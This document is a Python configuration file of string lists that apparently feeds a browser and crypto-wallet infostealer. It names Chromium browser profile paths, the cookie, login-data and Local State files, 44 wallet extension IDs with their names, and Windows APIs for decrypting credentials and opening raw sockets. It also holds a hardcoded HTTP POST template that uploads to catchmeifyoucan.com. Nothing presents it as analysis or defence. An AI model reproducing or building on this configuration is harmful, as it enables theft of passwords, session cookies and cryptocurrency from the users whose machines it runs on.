ChromiumBrowsersPaths = [
    "\\CryptoTab Browser\\User Data",
    "\\Amigo\\User Data",
    "\\Torch\\User Data",
    "\\Kometa\\User Data",
    "\\Orbitum\\User Data",
    "\\CentBrowser\\User Data",
    "\\Sputnik\\Sputnik\\User Data",
    "\\Vivaldi\\User Data",
    "\\Epic Privacy Browser\\User Data",
    "\\Microsoft\\Edge\\User Data",
    "\\uCozMedia\\Uran\\User Data",
    "\\Yandex\\YandexBrowser\\User Data",
    "\\BraveSoftware\\Brave-Browser\\User Data",
    "\\Iridium\\User Data",
    "\\Google\\Chrome SxS\\User Data",
    "\\Google\\Chrome\\User Data"
]
dlls = [
    "crypt32.dll", 
    "ws2_32.dll"
]
OtherStuff = ["\\Local State", "\\Default\\Network\\Cookies", "\\Default\\Login Data", "\\Default\\Local Extension Settings", "Content-Length: ", "POST /up HTTP/1.1\r\nHost: catchmeifyoucan.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\r\nAccept-Language: en-US,en;q=0.9,ar;q=0.8,fr;q=0.7\r\nContent-Type: application/octet-stream\r\nCookies: 5PRu5KZuwWBic98WWXMNvXakfVZD91\r\nConnection: keep-alive\r\nSec-Ch-Ua-Platform: Windows\r\nname: "]
MacroName = ["LOCAL_STATE", "COOKIES", "LOGIN_DATA", "EXTENSION_DATA", "CONTENT_LENGTH", "HTTPREQUEST"]

syscalls = [
    "ntdll.dll",
    "NtReadFile", 
    "NtCreateFile", 
    "NtQueryInformationFile", 
    "NtQueryDirectoryFile", 
    "NtWaitForSingleObject", 
    "NtFreeVirtualMemory", 
    "NtAllocateVirtualMemory"
]
functions = [
    "WSAStartup", 
    "WSASocketW", 
    "WSAConnect", 
    "send", 
    "CryptUnprotectData", 
    "TpAllocWork", 
    "TpPostWork", 
    "TpReleaseWork", 
    "LdrLoadDll"
]
EnvVariables = ["LOCALAPPDATA"]
wallets = [
    "nkbihfbeogaeaoehlefnkodbefgpgknn",
    "ejbalbakoplchlghecdalmeeeajnimhm",
    "fhbohimaelbohpjbbldcngcnapndodjp",
    "hnfanknocfeofbddgcijnmhnfnkdnaad",
    "fnjhmkhhmkbjkkabndcnnogagogbneec",
    "egjidjbpglichdcondbcbdnbeeppgdph",
    "ojggmchlghnjlapmfbnjholfjkiidbch",
    "opcgpfmipidbgpenhmajoajpbobppdil",
    "efbglgofoippbgcjepnhiblaibcnclgk",
    "ibnejdfjmmkpcnlpebklmnkoeoihofec",
    "ejjladinnckdgjemekebdpeokbikhfci",
    "phkbamefinggmakgklpkljjmgibohnba",
    "ebfidpplhabeedpnhjnobghokpiioolj",
    "afbcbjpbpfadlkmhmclhkeeodmamcflc",
    "aeachknmefphepccionboohckonoeemg",
    "bhghoamapcdpbohphigoooaddinpkbai",
    "aholpfdialjgjfhomihkjbmgjidlcdno",
    "bfnaelmomeimhlpmgjnjophhpkkoljpa",
    "agoakfejjabomempkjlepdflaleeobhb",
    "mfgccjchihfkkindfppnaooecgfneiii",
    "lgmpcpglpngdoalbgeoldeajfclnhafa",
    "bhhhlbepdkbapadjdnnojkbgioiodbic",
    "jblndlipeogpafnldhgmapagcccfchpi",
    "kncchdigobghenbbaddojjnnaogfppfj",
    "ffnbelfdoeiohenkjibnmadjiehjhajb",
    "hpglfhgfnhbgpjdenjgmdgoeiappafln",
    "cjelfplplebdjjenllpjcblmjkfcffne",
    "amkmjjmmflddogmhpjloimipbofnfjih",
    "fhilaheimglignddkjgofkcbgekhenbh",
    "nlbmnnijcnlegkjjpcfjclmcfggfefdm",
    "nanjmdknhkinifnkgdcggcfnhdaammmj",
    "nkddgncdjgjfcddamfgcmfnlhccnimig",
    "aiifbnbfobpmeekipheeijimdpnlpgpp",
    "fnnegphlobjdpkhecapkijjdkgcjhkib",
    "cgeeodpfagjceefieflmdfphplkenlfk",
    "pdadjkfkgcafgbceimcpbkalnfnepbnk",
    "mgffkfbidihjpoaomajlbgchddlicgpn",
    "aodkkagnadcbobfpggfnjeongemjbjca",
    "kpfopkelmapcoipemfendmdcghnegimn",
    "hmeobnfnfcmdkdcmlblgagmfpfboieaf",
    "lpfcbjknijpeeillifnkikgncikgfhdo",
    "dngmlblcodfobpdpecaadgfbcggfjfnm",
    "ookjlbkiijinhpmnjffcofjonbfbgaoc",
    "eigblbgjknlfbajkfhopmcojidlgcehm"
]

WalletsNames = [
    "Metamask",
    "Metamask2",
    "Binance",
    "Coinbase",
    "Ronin",
    "Trust",
    "Venom",
    "Sui",
    "Martian",
    "Tron",
    "Petra",
    "Pontem",
    "Fewcha",
    "Math",
    "Coin98",
    "Authenticator",
    "ExodusWeb3",
    "Phantom",
    "Core",
    "Tokenpocket",
    "Safepal",
    "Solfare",
    "Kaikas",
    "iWallet",
    "Yoroi",
    "Guarda",
    "Jaxx_Liberty",
    "Wombat",
    "Oxygen",
    "MEWCX",
    "Guild",
    "Saturn",
    "TerraStation",
    "HarmonyOutdated",
    "Ever",
    "KardiaChain",
    "PaliWallet",
    "BoltX",
    "Liquality",
    "XDEFI",
    "Nami",
    "MaiarDEFI",
    "TempleTezos",
    "XMR_PT"
]